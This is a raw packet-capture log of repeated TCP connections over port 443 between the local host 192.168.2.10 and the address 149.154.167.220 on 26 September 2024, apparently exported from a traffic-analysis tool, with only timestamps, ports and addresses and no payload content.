                                              Sep 26, 2024 11:36:29.986597061 CEST49912443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:29.988368988 CEST49912443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:29.988380909 CEST44349912149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:29.988650084 CEST44349912149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:30.121720076 CEST49912443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:30.692368031 CEST49912443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:30.692497969 CEST44349912149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:30.692562103 CEST49912443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:30.695991039 CEST49914443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:30.696104050 CEST44349914149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:30.696186066 CEST49914443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:30.696433067 CEST49914443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:30.696464062 CEST44349914149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:31.346520901 CEST44349914149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:31.346626997 CEST49914443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:31.350606918 CEST49914443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:31.350641012 CEST44349914149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:31.350938082 CEST44349914149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:31.418560028 CEST49914443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:32.084328890 CEST49914443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:32.084448099 CEST44349914149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:32.084507942 CEST49914443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:32.165693045 CEST49916443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:32.165755033 CEST44349916149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:32.165813923 CEST49916443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:32.166239023 CEST49916443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:32.166256905 CEST44349916149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:32.826493979 CEST44349916149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:32.826792955 CEST49916443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:32.831820011 CEST49916443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:32.831846952 CEST44349916149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:32.832134962 CEST44349916149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:32.919820070 CEST49916443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:33.795469999 CEST49916443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:33.795691967 CEST44349916149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:33.795753956 CEST49916443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:33.800944090 CEST49918443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:33.800976992 CEST44349918149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:33.801058054 CEST49918443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:33.801359892 CEST49918443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:33.801372051 CEST44349918149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:34.437105894 CEST44349918149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:34.437405109 CEST49918443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:34.439193010 CEST49918443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:34.439199924 CEST44349918149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:34.439717054 CEST44349918149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:34.606121063 CEST49918443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:35.206226110 CEST49918443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:35.206311941 CEST44349918149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:35.206547022 CEST44349918149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:35.206638098 CEST49918443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:35.206638098 CEST49918443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:35.389111996 CEST49920443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:35.389152050 CEST44349920149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:35.389228106 CEST49920443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:35.389560938 CEST49920443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:35.389573097 CEST44349920149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:36.017446041 CEST44349920149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:36.017520905 CEST49920443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:36.020487070 CEST49920443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:36.020525932 CEST44349920149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:36.020833969 CEST44349920149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:36.106158018 CEST49920443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:37.071531057 CEST49920443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:37.071626902 CEST44349920149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:37.071697950 CEST49920443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:37.075413942 CEST49922443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:37.075464010 CEST44349922149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:37.075531960 CEST49922443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:37.075771093 CEST49922443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:37.075787067 CEST44349922149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:37.754518986 CEST44349922149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:37.754609108 CEST49922443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:37.756359100 CEST49922443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:37.756367922 CEST44349922149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:37.756748915 CEST44349922149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:37.918724060 CEST49922443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:38.501189947 CEST49922443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:38.501348972 CEST44349922149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:38.501584053 CEST44349922149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:38.501648903 CEST49922443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:38.501648903 CEST49922443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:38.588502884 CEST49924443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:38.588548899 CEST44349924149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:38.588624001 CEST49924443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:38.588936090 CEST49924443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:38.588942051 CEST44349924149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:39.225516081 CEST44349924149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:39.225687981 CEST49924443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:39.227102041 CEST49924443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:39.227112055 CEST44349924149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:39.227320910 CEST44349924149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:39.418595076 CEST49924443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:40.096865892 CEST49924443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:40.096996069 CEST44349924149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:40.097062111 CEST49924443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:40.100800037 CEST49926443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:40.100857019 CEST44349926149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:40.101486921 CEST49926443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:40.101885080 CEST49926443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:40.101897001 CEST44349926149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:40.750324965 CEST44349926149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:40.750422001 CEST49926443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:40.752119064 CEST49926443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:40.752136946 CEST44349926149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:40.752428055 CEST44349926149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:40.918591022 CEST49926443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:41.622354984 CEST49926443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:41.622498035 CEST44349926149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:41.622565985 CEST49926443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:41.719140053 CEST49928443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:41.719185114 CEST44349928149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:41.719249010 CEST49928443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:41.719825029 CEST49928443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:41.719836950 CEST44349928149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:42.347302914 CEST44349928149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:42.347829103 CEST49928443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:42.350784063 CEST49928443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:42.350796938 CEST44349928149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:42.351136923 CEST44349928149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:42.527992010 CEST49928443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:43.250365973 CEST49928443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:43.250479937 CEST44349928149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:43.250545025 CEST49928443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:43.253654003 CEST49930443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:43.253696918 CEST44349930149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:43.253757000 CEST49930443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:43.253973007 CEST49930443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:43.253983021 CEST44349930149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:43.882057905 CEST44349930149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:43.882142067 CEST49930443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:43.883615017 CEST49930443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:43.883625984 CEST44349930149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:43.884022951 CEST44349930149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:43.968430042 CEST49930443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:44.778191090 CEST49930443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:44.778294086 CEST44349930149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:44.778374910 CEST49930443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:44.872001886 CEST49932443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:44.872108936 CEST44349932149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:44.872190952 CEST49932443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:44.872821093 CEST49932443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:44.872853041 CEST44349932149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:45.494568110 CEST44349932149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:45.494666100 CEST49932443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:45.496414900 CEST49932443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:45.496448040 CEST44349932149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:45.496714115 CEST44349932149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:45.540802956 CEST49932443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:46.380861044 CEST49932443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:46.381093979 CEST44349932149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:46.381160975 CEST49932443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:46.384382010 CEST49934443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:46.384481907 CEST44349934149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:46.384562969 CEST49934443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:46.384774923 CEST49934443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:46.384809017 CEST44349934149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:46.998559952 CEST44349934149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:46.998665094 CEST49934443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:47.000533104 CEST49934443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:47.000550985 CEST44349934149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:47.000852108 CEST44349934149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:47.043581009 CEST49934443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:47.905337095 CEST49934443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:47.905518055 CEST44349934149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:47.905601025 CEST49934443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:48.026627064 CEST49936443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:48.026731014 CEST44349936149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:48.026909113 CEST49936443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:48.029385090 CEST49936443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:48.029416084 CEST44349936149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:48.662080050 CEST44349936149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:48.662287951 CEST49936443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:48.663978100 CEST49936443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:48.663990974 CEST44349936149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:48.664403915 CEST44349936149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:48.715472937 CEST49936443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:49.580910921 CEST49936443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:49.581105947 CEST44349936149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:49.581192970 CEST49936443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:49.584208965 CEST49938443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:49.584254980 CEST44349938149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:49.584340096 CEST49938443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:49.584625959 CEST49938443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:49.584636927 CEST44349938149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:50.210261106 CEST44349938149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:50.210407019 CEST49938443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:50.211893082 CEST49938443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:50.211901903 CEST44349938149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:50.212352037 CEST44349938149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:50.309293032 CEST49938443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:51.239424944 CEST49938443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:51.239633083 CEST44349938149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:51.239779949 CEST49938443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:51.327898979 CEST49940443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:51.327955008 CEST44349940149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:51.328018904 CEST49940443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:51.328521013 CEST49940443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:51.328540087 CEST44349940149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:52.111973047 CEST44349940149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:52.112062931 CEST49940443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:52.116080046 CEST49940443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:52.116091967 CEST44349940149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:52.116769075 CEST44349940149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:52.309215069 CEST49940443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:53.026271105 CEST49940443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:53.026384115 CEST44349940149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:53.026585102 CEST49940443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:53.030098915 CEST49942443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:53.030148983 CEST44349942149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:53.030276060 CEST49942443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:53.030685902 CEST49942443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:53.030699015 CEST44349942149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:53.663345098 CEST44349942149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:53.663456917 CEST49942443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:53.687735081 CEST49942443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:53.687800884 CEST44349942149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:53.688760042 CEST44349942149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:53.895443916 CEST44349942149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:53.895514011 CEST49942443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:54.660295963 CEST49942443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:54.660517931 CEST44349942149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:54.660603046 CEST49942443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:54.760483027 CEST49944443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:54.760540009 CEST44349944149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:54.760596037 CEST49944443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:54.761054993 CEST49944443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:54.761071920 CEST44349944149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:55.373100042 CEST44349944149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:55.373208046 CEST49944443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:55.374608994 CEST49944443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:55.374619007 CEST44349944149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:55.375025034 CEST44349944149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:55.543598890 CEST49944443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:56.317357063 CEST49944443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:56.317543983 CEST44349944149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:56.317642927 CEST49944443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:56.321310997 CEST49946443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:56.321357965 CEST44349946149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:56.321423054 CEST49946443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:56.321705103 CEST49946443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:56.321716070 CEST44349946149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:57.009829998 CEST44349946149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:57.010072947 CEST49946443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:57.011396885 CEST49946443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:57.011411905 CEST44349946149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:57.011801958 CEST44349946149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:57.219759941 CEST49946443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:57.979568005 CEST49946443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:57.979769945 CEST44349946149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:57.979868889 CEST49946443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:58.097183943 CEST49948443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:58.097232103 CEST44349948149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:58.097327948 CEST49948443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:58.097570896 CEST49948443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:58.097584009 CEST44349948149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:58.718029022 CEST44349948149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:58.718116999 CEST49948443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:58.719721079 CEST49948443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:58.719729900 CEST44349948149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:58.720693111 CEST44349948149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:58.840461969 CEST49948443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:59.594722986 CEST49948443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:59.594852924 CEST44349948149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:59.594935894 CEST49948443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:59.598810911 CEST49950443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:59.598850965 CEST44349950149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:36:59.598917007 CEST49950443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:59.599236012 CEST49950443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:36:59.599248886 CEST44349950149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:00.235282898 CEST44349950149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:00.235441923 CEST49950443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:00.236860991 CEST49950443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:00.236871004 CEST44349950149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:00.237205982 CEST44349950149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:00.343842030 CEST49950443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:01.158953905 CEST49950443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:01.159064054 CEST44349950149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:01.159123898 CEST49950443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:01.268141031 CEST49952443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:01.268189907 CEST44349952149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:01.268241882 CEST49952443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:01.268718958 CEST49952443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:01.268735886 CEST44349952149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:01.934046984 CEST44349952149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:01.934144020 CEST49952443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:01.936708927 CEST49952443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:01.936731100 CEST44349952149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:01.937083006 CEST44349952149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:02.043616056 CEST49952443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:02.822721004 CEST49952443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:02.822873116 CEST44349952149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:02.822989941 CEST49952443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:02.829395056 CEST49954443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:02.829443932 CEST44349954149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:02.829862118 CEST49954443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:02.830120087 CEST49954443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:02.830130100 CEST44349954149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:03.447788000 CEST44349954149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:03.447863102 CEST49954443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:03.449609041 CEST49954443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:03.449623108 CEST44349954149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:03.450480938 CEST44349954149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:03.543606997 CEST49954443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:04.319243908 CEST49954443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:04.319354057 CEST44349954149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:04.319521904 CEST49954443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:04.410180092 CEST49956443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:04.410229921 CEST44349956149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:04.410397053 CEST49956443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:04.410763979 CEST49956443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:04.410779953 CEST44349956149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:05.100672007 CEST44349956149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:05.100755930 CEST49956443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:05.132841110 CEST49956443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:05.132875919 CEST44349956149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:05.133141994 CEST44349956149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:05.307761908 CEST49956443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:06.061054945 CEST49956443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:06.061156034 CEST44349956149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:06.061290026 CEST49956443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:06.064635038 CEST49958443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:06.064738989 CEST44349958149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:06.064820051 CEST49958443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:06.065054893 CEST49958443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:06.065089941 CEST44349958149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:06.669703960 CEST44349958149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:06.669779062 CEST49958443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:06.672027111 CEST49958443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:06.672045946 CEST44349958149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:06.672293901 CEST44349958149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:06.840496063 CEST49958443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:07.558279991 CEST49958443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:07.558399916 CEST44349958149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:07.558459044 CEST49958443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:07.679847002 CEST49960443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:07.679898024 CEST44349960149.154.167.220192.168.2.10
                                              Sep 26, 2024 11:37:07.679958105 CEST49960443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:07.680928946 CEST49960443192.168.2.10149.154.167.220
                                              Sep 26, 2024 11:37:07.680943966 CEST44349960149.154.167.220192.168.2.10
